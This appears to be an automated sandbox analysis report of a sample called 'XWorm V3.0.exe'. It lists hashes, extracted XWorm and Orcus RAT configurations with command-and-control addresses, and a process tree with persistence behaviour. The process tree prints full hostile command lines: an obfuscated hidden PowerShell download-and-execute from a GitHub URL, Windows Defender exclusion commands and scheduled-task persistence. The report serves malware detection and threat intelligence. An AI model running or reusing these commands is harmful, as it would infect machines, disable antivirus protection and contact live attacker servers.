Analysis
max time kernel: 144s
max time network: 153s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 16-07-2024 01:03
Static task: static1
Behavioral task: behavioral1
  Sample: XWorm V3.0.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: XWorm V3.0.exe
  Resource: win10v2004-20240709-en
General
Target: XWorm V3.0.exe
Size: 19.3MB
MD5: d7e85bc99cb79b98d64a6d4b8b7d041b
SHA1: 137f70c449be88103e4f1abfa80658ccbd9ba3f9
SHA256: 8dd83abb25a341413e009b4b6b0b12582382d99bc2f3d2b0d07c95bf3b8c0c81
SHA512: c35a74526edee423254a4335946a9d447c95a31a4acb9923ee667d074f9c4f84d0d5f6cf22bc6a23012ebe04ef4d6ad43bd2e55dc287d4dfe52a5d9b71f8d4f1
SSDEEP: 393216:JZgqzDlLO/uc+9bPugF7cp4rTKiSVbafhkCvBeLfhfzm:JqctO/k9bPugypcKtVGhkckfBy
Malware Config
Extracted: xworm
  147.185.221.18:43279
  147.185.221.18:47186
  147.185.221.18:45497
  147.185.221.18:24123
  147.185.221.18:41609
  Install_directory: %ProgramData%
  install_file: Discord.exe
Extracted: orcus
  147.185.221.18:43279
  1a3206b13a7141d7a10982ddf15a2503
  autostart_method: Registry
  enable_keylogger: false
  install_path: %programfiles%\Orcus\Orcus.exe
  reconnect_delay: 10000
  registry_keyname: Orcus
  taskscheduler_taskname: Orcus
  watchdog_path: AppData\OrcusWatchdog.exe
Signatures
Detect Xworm Payload (17 IoCs)
Processes (resource  yara_rule):
  behavioral1/files/0x0008000000018b6e-30.dat  family_xworm
  behavioral1/files/0x0006000000018b89-35.dat  family_xworm
  behavioral1/memory/2912-34-0x0000000000EF0000-0x0000000000F0A000-memory.dmp  family_xworm
  behavioral1/files/0x0006000000018bac-39.dat  family_xworm
  behavioral1/files/0x0009000000018bbf-47.dat  family_xworm
  behavioral1/memory/2628-50-0x0000000000EE0000-0x0000000000F10000-memory.dmp  family_xworm
  behavioral1/files/0x0007000000018bd4-53.dat  family_xworm
  behavioral1/memory/2808-43-0x0000000001270000-0x0000000001286000-memory.dmp  family_xworm
  behavioral1/memory/2780-42-0x0000000000A40000-0x0000000000A5E000-memory.dmp  family_xworm
  behavioral1/memory/864-58-0x0000000000A30000-0x0000000000A48000-memory.dmp  family_xworm
  behavioral1/memory/3040-455-0x00000000012B0000-0x00000000012E0000-memory.dmp  family_xworm
  behavioral1/memory/1412-459-0x00000000000F0000-0x0000000000108000-memory.dmp  family_xworm
  behavioral1/memory/2096-460-0x0000000000860000-0x0000000000876000-memory.dmp  family_xworm
  behavioral1/memory/1636-461-0x0000000001170000-0x000000000118E000-memory.dmp  family_xworm
  behavioral1/memory/1700-467-0x0000000000900000-0x0000000000918000-memory.dmp  family_xworm
  behavioral1/memory/2976-468-0x00000000012C0000-0x00000000012DE000-memory.dmp  family_xworm
  behavioral1/memory/2616-469-0x00000000011C0000-0x00000000011D6000-memory.dmp  family_xworm
Orcus main payload (1 IoCs)
Processes (resource  yara_rule):
  behavioral1/files/0x0009000000018d48-56.dat  family_orcus
Orcus Rat Executable (2 IoCs)
Processes (resource  yara_rule):
  behavioral1/files/0x0009000000018d48-56.dat  orcus
  behavioral1/memory/276-205-0x0000000000BC0000-0x0000000000CA8000-memory.dmp  orcus
Command and Scripting Interpreter: PowerShell (1 TTPs, 21 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes (pid Process):
  powershell.exe, PIDs 984, 2256, 2296, 1784, 2728, 2788, 832, 2680, 2040, 2948, 2908, 2216, 2968, 2664, 2464, 940, 396, 2352, 588, 2576, 2708
Drops startup file (9 IoCs)
Processes (description  ioc  Process):
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord_Update.lnk  4.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk  1.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk  1.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk  2.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk  2.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk  5.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk  3.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk  5.exe
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord_Update.lnk  4.exe
Executes dropped EXE (19 IoCs)
Processes (pid Process):
  2820  XWorm V3.0.exe
  2912  1.exe
  2808  2.exe
  2780  3.exe
  2628  4.exe
  864  5.exe
  2596  6.exe
  2976  7.exe
  2480  7.exe
  276  Orcus.exe
  1216
  3040  Discord_Update.exe
  1412  WindowsDefender.exe
  1636  discord.exe
  2096  svhost.exe
  2952  Discord_Update.exe
  2976  discord.exe
  1700  WindowsDefender.exe
  2616  svhost.exe
Loads dropped DLL (2 IoCs)
Processes (pid Process):
  2820  XWorm V3.0.exe
  2480  7.exe
Processes (resource  yara_rule):
  behavioral1/files/0x000500000001a5b9-194.dat  upx
  behavioral1/memory/2480-195-0x000007FEEAEE0000-0x000007FEEB34E000-memory.dmp  upx
Adds Run key to start application (2 TTPs, 6 IoCs)
Processes (description  ioc  Process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsDefender.exe"  5.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe"  3.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Discord_Update = "C:\\Users\\Admin\\AppData\\Roaming\\Discord_Update.exe"  4.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Orcus = "\"C:\\Program Files\\Orcus\\Orcus.exe\""  Orcus.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe"  2.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord.exe"  1.exe
Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow  ioc):
  4  ip-api.com
  5  ip-api.com
  6  ip-api.com
  2  ip-api.com
  3  ip-api.com
Drops file in Program Files directory (3 IoCs)
Processes (description  ioc  Process):
  File created  C:\Program Files\Orcus\Orcus.exe  6.exe
  File opened for modification  C:\Program Files\Orcus\Orcus.exe  6.exe
  File created  C:\Program Files\Orcus\Orcus.exe.config  6.exe
Detects Pyinstaller (1 IoCs)
Processes (resource  yara_rule):
  behavioral1/files/0x0006000000018f82-65.dat  pyinstaller
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Scheduled Task/Job: Scheduled Task (1 TTPs, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid Process):
  schtasks.exe, PIDs 1296, 568, 1480, 1540, 2996
Suspicious behavior: EnumeratesProcesses (25 IoCs)
Processes (pid Process):
  powershell.exe, PIDs 2708, 2948, 2788, 2908, 2728, 2664, 2464, 2256, 2216, 984, 832, 940, 2296, 396, 2680, 2040, 2968, 2352, 588, 1784, 2576
  2912  1.exe
  2808  2.exe
  864  5.exe
  2780  3.exe
Suspicious use of AdjustPrivilegeToken (39 IoCs)
Processes (description  pid  Process); the token in every entry is SeDebugPrivilege:
  Token: SeDebugPrivilege  2708  powershell.exe
  Token: SeDebugPrivilege  2780  3.exe
  Token: SeDebugPrivilege  2912  1.exe
  Token: SeDebugPrivilege  2808  2.exe
  Token: SeDebugPrivilege  2628  4.exe
  Token: SeDebugPrivilege  864  5.exe
  Token: SeDebugPrivilege  powershell.exe, PIDs 2948, 2788, 2908, 2728, 2664, 2464, 2256, 2216, 984, 832, 940, 2296, 396, 2680, 2040, 2968, 2352, 588, 1784, 2576
  Token: SeDebugPrivilege  2912  1.exe
  Token: SeDebugPrivilege  2808  2.exe
  Token: SeDebugPrivilege  864  5.exe
  Token: SeDebugPrivilege  2780  3.exe
  Token: SeDebugPrivilege  2628  4.exe
  Token: SeDebugPrivilege  3040  Discord_Update.exe
  Token: SeDebugPrivilege  1412  WindowsDefender.exe
  Token: SeDebugPrivilege  2096  svhost.exe
  Token: SeDebugPrivilege  1636  discord.exe
  Token: SeDebugPrivilege  2952  Discord_Update.exe
  Token: SeDebugPrivilege  1700  WindowsDefender.exe
  Token: SeDebugPrivilege  2976  discord.exe
  Token: SeDebugPrivilege  2616  svhost.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
Processes (pid Process):
  276  Orcus.exe
Suspicious use of SendNotifyMessage (1 IoCs)
Processes (pid Process):
  276  Orcus.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes (pid Process):
  2912  1.exe
  2808  2.exe
  864  5.exe
  2780  3.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: XWorm V3.0.exe, cmd.exe, XWorm V3.0.exe, 6.exe, csc.exe, 7.exe, 1.exe, 2.exe, 5.exe, 4.exe, 3.exe
Entries (source PID -> target PID  source Process  target procid); each relationship was recorded three times (the last one once), 64 entries in total:
  2064 -> 2920  XWorm V3.0.exe  29
  2920 -> 2708  cmd.exe  31
  2064 -> 2820  XWorm V3.0.exe  32
  2820 -> 2912  XWorm V3.0.exe  33
  2820 -> 2808  XWorm V3.0.exe  34
  2820 -> 2780  XWorm V3.0.exe  35
  2820 -> 2628  XWorm V3.0.exe  36
  2820 -> 864  XWorm V3.0.exe  37
  2820 -> 2596  XWorm V3.0.exe  38
  2820 -> 2976  XWorm V3.0.exe  91
  2596 -> 3020  6.exe  40
  3020 -> 608  csc.exe  42
  2976 -> 2480  7.exe  43
  2596 -> 276  6.exe  44
  2912 -> 2908  1.exe  46
  2808 -> 2948  2.exe  47
  864 -> 2788  5.exe  48
  2628 -> 2728  4.exe  49
  2780 -> 2664  3.exe  53
  2808 -> 2464  2.exe  56
  2628 -> 2256  4.exe  58
  864 -> 2216  5.exe  60
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe (PID 2064)
  command line: "C:\Users\Admin\AppData\Local\Temp\XWorm V3.0.exe"
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 2920)
      command line: cmd /c ""C:\Users\Admin\AppData\Roaming\XWorm_V3.0.bat" "
      - Suspicious use of WriteProcessMemory
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2708)
          command line: powershell -NoProf"i"le -Executio"n"Policy B"y"pass -Window"S"tyle Hidden -Co"m"mand "Inv"o"ke-W"e"bRequest -Uri 'https://github.com/GoldHourse/OPTIMIZER/raw/main/XWorm_V3.0.exe' -Ou"t"File 'XWorm_V3.0.exe';" "Start-Process -FilePath 'XWorm_V3.0.exe'"
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe (PID 2820)
      command line: "C:\Users\Admin\AppData\Roaming\XWorm V3.0.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Roaming\1.exe (PID 2912)
          command line: "C:\Users\Admin\AppData\Roaming\1.exe"
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2908)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\1.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 984)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 940)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 588)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\schtasks.exe (PID 1540)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord.exe"
              - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\2.exe (PID 2808)
          command line: "C:\Users\Admin\AppData\Roaming\2.exe"
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2948)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\2.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2464)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 396)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2968)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\schtasks.exe (PID 2996)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
              - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\3.exe (PID 2780)
          command line: "C:\Users\Admin\AppData\Roaming\3.exe"
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2664)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 832)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2040)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1784)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\schtasks.exe (PID 568)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"
              - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\4.exe (PID 2628)
          command line: "C:\Users\Admin\AppData\Roaming\4.exe"
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2728)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\4.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2256)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2296)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord_Update.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2576)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord_Update.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\schtasks.exe (PID 1480)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord_Update" /tr "C:\Users\Admin\AppData\Roaming\Discord_Update.exe"
              - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\5.exe (PID 864)
          command line: "C:\Users\Admin\AppData\Roaming\5.exe"
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2788)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\5.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2216)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2680)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsDefender.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2352)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\System32\schtasks.exe (PID 1296)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender.exe"
              - Scheduled Task/Job: Scheduled Task
        C:\Users\Admin\AppData\Roaming\6.exe (PID 2596)
          command line: "C:\Users\Admin\AppData\Roaming\6.exe"
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Suspicious use of WriteProcessMemory
            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (PID 3020)
              command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9smatpdu.cmdline"
              - Suspicious use of WriteProcessMemory
                C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (PID 608)
                  command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES27EC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC27EB.tmp"
            C:\Program Files\Orcus\Orcus.exe (PID 276)
              command line: "C:\Program Files\Orcus\Orcus.exe"
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SendNotifyMessage
        C:\Users\Admin\AppData\Roaming\7.exe (PID 2976)
          command line: "C:\Users\Admin\AppData\Roaming\7.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Roaming\7.exe (PID 2480)
              command line: "C:\Users\Admin\AppData\Roaming\7.exe"
              - Executes dropped EXE
              - Loads dropped DLL
C:\Windows\system32\conhost.exe (PID 2976)
  command line: \??\C:\Windows\system32\conhost.exe "108196391931600450721056642541075254560-183627000210658113384898043071169406501"
C:\Windows\system32\taskeng.exe (PID 2928)
  command line: taskeng.exe {C41B241E-874D-426D-B543-92B88FCF6476} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
    C:\Users\Admin\AppData\Roaming\Discord_Update.exe (PID 3040)
      command line: C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\discord.exe (PID 1636)
      command line: C:\Users\Admin\AppData\Roaming\discord.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\WindowsDefender.exe (PID 1412)
      command line: C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\svhost.exe (PID 2096)
      command line: C:\Users\Admin\AppData\Roaming\svhost.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\Discord_Update.exe (PID 2952)
      command line: C:\Users\Admin\AppData\Roaming\Discord_Update.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\discord.exe (PID 2976)
      command line: C:\Users\Admin\AppData\Roaming\discord.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\WindowsDefender.exe (PID 1700)
      command line: C:\Users\Admin\AppData\Roaming\WindowsDefender.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Roaming\svhost.exe (PID 2616)
      command line: C:\Users\Admin\AppData\Roaming\svhost.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads